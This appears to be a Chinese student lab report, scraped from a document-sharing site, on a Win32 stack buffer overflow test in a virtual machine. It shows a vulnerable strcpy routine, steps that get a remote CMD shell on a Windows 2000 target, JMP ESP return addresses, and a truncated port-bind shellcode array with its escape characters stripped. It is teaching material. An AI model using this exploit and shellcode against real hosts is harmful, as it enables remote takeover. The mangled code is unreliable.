网络安全缓冲区溢出技术实验报告

《网络安全缓冲区溢出技术实验报告》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

1、网络实验报告学生姓名学号组员：实验项目Windows缓冲区溢出测试一、实验目的及要求1、目的了解和掌握Win32平台缓冲区溢出原理；学会使用Win32平台Shellcode技术。2、内容及要求以windows2000server虚拟机为测试对象，修改server.cpp和exploit.c，利用shellcodeportbind给出的shellcode,远程获得CMD,并启动目标机器的ftp服务。二、仪器用具计算机（分别装有windowsserver2000和windows7操作系统），本实验使用的是虚拟机Wmware8.0在同一台电脑上面安装两个操作系统。三、实

2、验方法与步骤在实验开始前，首先编写可能产生缓冲区溢出的程序(server.cpp)和测试程序(exploit.c)。在server.cpp中能够产生缓冲区溢出的程序片段如下：voidoverflow(char*s,intsize){chars1[50];printf("receive%dbytes",size);s[size]=0;strcpy(s1,s);}这两个程序的完整代码见附件。由于本实验是在虚拟机环境下测试的，所以在开始实验前，分别记下两个系统的IP地址：运行server程序的系统IP地址为：192.168.209.131运行exploit程序的系统IP

3、地址为：192.168.209.1实验的过程如下：1.在windows2000系统下分别编译server.cpp和exploit.c程序，详细过程如下：C:test>clserver.cppC:test>clexploit.c编译完成后分别产生exploit.exe、exploit.obj、server.exe、server.obj截图如下图1所示：图11.在windows2000系统中运行服务程序：server.cppC:test>server.exe截图如下图2所示：图22.将编译好的exploit程序拷贝到windows7系统中来测试3.在window

4、s7系统中运行exploit.exe程序，如下D:clientexploit.exe192.168.209.1318888截图如下图3所示：图3这样就可以获得目标主机的CMD了，接下来的任务是开启目标主机的FTP服务。4.紧接着上面的步骤，在获得CMD的情况下，运行如下的命令来开启目标机器的FTP服务C:test>netstart“ftppublishingservice”截图如下图4所示：图4四、实验结果及讨论从上面的截图可以看出，实验通过exploit.exe程序顺利的获取了目标机器的CMD并启动FTP服务。由于不同的系统下JMP跳转指令的地址不相同，因

5、此在windowsxp与windows2000程序的差别在于#defineJUMPESP的定义。windows2000下可以采用如下的定义：#defineJUMPESP"x12x45xfax7f"windowsxpsp2可以采用下面的定义：#defineJUMPESP"xedx1ex96x7c"由于程序是使用VC6编译器来编译的，它保持4字节栈对齐，因此服务程序server.cpp并不需要任何改动。五、附录exploit.c程序代码#include#include#include#prag

6、macomment(lib,"ws2_32")//jmpespaddressofchineseversion#defineJUMPESP"x12x45xfax7f"charshellcode[]="xebx10x5bx4bx33xc9x66xb9x23x01x80x34x0bxf8xe2xfa""xebx05xe8xebxffxffxffx11x01xf8xf8xf8xa7x9cx59xc8""xf8xf8xf8x73xb8xf4x73x88xe4x55x73x90x

7、f0x73x0fx92""xfbxa1x10x61xf8xf8xf8x1ax01x90xcbxcaxf8xf8x90x8f""x8bxcaxa7xacx07xeex73x10x92xfdxa1x10x78xf8xf8xf8""x1ax01x79x14x68xf9xf8xf8xacx90xf9xf9xf8xf8x07xae""xf4xa8xa8xa8xa8x92xf9x92xfax07xaexe8x73x20xcbx38""xa8

8、xa8x